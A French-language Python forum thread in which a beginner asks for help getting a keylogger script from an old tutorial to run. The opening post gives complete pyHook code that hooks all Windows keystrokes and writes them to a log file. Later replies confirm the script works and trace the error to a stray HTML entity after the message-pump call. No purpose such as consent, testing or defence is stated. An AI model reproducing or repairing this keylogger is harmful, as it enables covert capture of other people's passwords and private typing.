IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Python Discussion :

Aide pour créer keylogger [Python 3.X]


Sujet :

Python

  1. #1
    Invité
    Invité(e)
    Par défaut Aide pour créer keylogger
    Bonjour!

    Je suis relativement nouveau à Python. J'ai trouvé un ancien tutoriel Python sur comment faire un script keylogger.

    Le voici:
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
     
    import pyHook, pythoncom, sys, logging
     
    file_log = 'C:\\log.txt'
     
    def OnKeyboardEvent (event):
        logging.basicConfig (filename=file_log, level=logging.DEBUG, format='%(message)s')
        logging.log(10,chr(event.Ascii))
     
    hooks_manager = pyHook.HookManager()
    hooks_manager.KeyDown = OnKeyboardEvent
    hooks_manager.HookKeyboard()
    pythoncom.PumpMessages()
    J'ai les modules qu'il fauts mais quand je veux l'executer j'ai ceci:
    Nom : 1.PNG
Affichages : 3674
Taille : 5,3 Ko
    Puis quand j'appuye sur Ok, il me met le curseur à la fin du code.

    Es ce que vous savez ce qu'il cloche?

    Merci!!!!!

  2. #2
    Expert éminent
    Avatar de tyrtamos
    Homme Profil pro
    Retraité
    Inscrit en
    Décembre 2007
    Messages
    4 462
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Var (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Retraité

    Informations forums :
    Inscription : Décembre 2007
    Messages : 4 462
    Points : 9 249
    Points
    9 249
    Billets dans le blog
    6
    Par défaut
    Bonjour,

    Impressionnant ce pyHook pour Windows...

    Par curiosité, j'ai installé le pyHook pour Python 3.4 (site: http://www.lfd.uci.edu/~gohlke/pythonlibs/).

    J'ai fait tourner l'exemple fourni (site-packages\pyHook\example.py): ça marche!

    J'ai fait tourné ton code (avec seulement conversion des print => print(...)): ça marche!

    Ce qui fait que je n'ai pas obtenu ton message d'erreur. Mais c'est bizarre que ce message apparaisse dans une fenêtre: peut-être as-tu lancé ton programme dans un outil de développement? Si oui, il y a peut-être un conflit avec celui-ci: essaie plutôt de le lancer à partir de la console cmd.exe pour voir.

    Il reste que le readme parle de problèmes possibles avec les claviers "non anglais":

    - pyHook is reported to break dead keys on non-US-english keyboards.
    Il y a peut-être d'autres problèmes...
    Un expert est une personne qui a fait toutes les erreurs qui peuvent être faites, dans un domaine étroit... (Niels Bohr)
    Mes recettes python: http://www.jpvweb.com

  3. #3
    Expert éminent
    Avatar de jurassic pork
    Homme Profil pro
    Bidouilleur
    Inscrit en
    Décembre 2008
    Messages
    3 954
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Bidouilleur
    Secteur : Industrie

    Informations forums :
    Inscription : Décembre 2008
    Messages : 3 954
    Points : 9 284
    Points
    9 284
    Par défaut
    hello,

    3751_creator, la pompe de messages n'aime pas trop qu'on lui mette n'importe quoi derrière . Un copier-coller malheureux ?
    Jurassic computer : Sinclair ZX81 - Zilog Z80A à 3,25 MHz - RAM 1 Ko - ROM 8 Ko

  4. #4
    Invité
    Invité(e)
    Par défaut
    J'ai tout réinstallé, et tout réécrit sur un nouveau fichier mais rien n'y fait.

    J'ai fait un help() + modules et pyHook, pythoncom, sys et logging sont présents....

  5. #5
    Invité
    Invité(e)
    Par défaut
    Bon petit, update, j'ai mis en commentaire la dernière ligne et sa à l'air de marcher. Donc bon..... Je ne met pas en résolu tt de suite pour savoir si l'un de vous comprennetn pourquoi ca fait ca.

  6. #6
    Expert éminent
    Avatar de fred1599
    Homme Profil pro
    Lead Dev Python
    Inscrit en
    Juillet 2006
    Messages
    3 823
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Meurthe et Moselle (Lorraine)

    Informations professionnelles :
    Activité : Lead Dev Python
    Secteur : Arts - Culture

    Informations forums :
    Inscription : Juillet 2006
    Messages : 3 823
    Points : 7 119
    Points
    7 119
    Par défaut
    Je ne met pas en résolu tt de suite pour savoir si l'un de vous comprennetn pourquoi ca fait ca.
    jurassic_pork a déjà répondu à cette question...
    Celui qui trouve sans chercher est celui qui a longtemps cherché sans trouver.(Bachelard)
    La connaissance s'acquiert par l'expérience, tout le reste n'est que de l'information.(Einstein)

  7. #7
    Candidat au Club
    Homme Profil pro
    Lycéen
    Inscrit en
    Juillet 2017
    Messages
    3
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Val de Marne (Île de France)

    Informations professionnelles :
    Activité : Lycéen

    Informations forums :
    Inscription : Juillet 2017
    Messages : 3
    Points : 3
    Points
    3
    Par défaut
    Bonjour un peu beaucoup tard mais je pense que le problème vient de la

    pythoncom.PumpMessages()

    il faudrait l'écrire comme ça :

    pythoncom.PumpMessages()

    le problème vient du "&;"

    ^^ voilivoilou

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Aide pour créer mon site, aidez moi.
    Par ganon551 dans le forum Mon site
    Réponses: 24
    Dernier message: 30/06/2006, 19h45
  2. aide pour créer une faq sur inno setup
    Par fsx999 dans le forum Langage
    Réponses: 3
    Dernier message: 12/06/2006, 20h16
  3. besoin d'aide pour créer un uml
    Par bob75018 dans le forum UML
    Réponses: 9
    Dernier message: 11/03/2006, 12h18
  4. aide pour créer un jeu
    Par cstefany dans le forum Général JavaScript
    Réponses: 8
    Dernier message: 23/10/2005, 03h51
  5. [FLASH MX2004] Aide pour créer une animation
    Par SnakeTales dans le forum Flash
    Réponses: 5
    Dernier message: 04/08/2005, 10h50

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo